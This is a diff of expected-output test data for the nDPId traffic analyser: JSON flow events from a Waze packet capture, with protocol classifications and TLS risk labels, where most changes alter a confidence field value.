-00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} 
-00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} 
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
-00910{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
-00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00910{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1435587868996,"flow_last_seen":1435587869400,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":1420,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
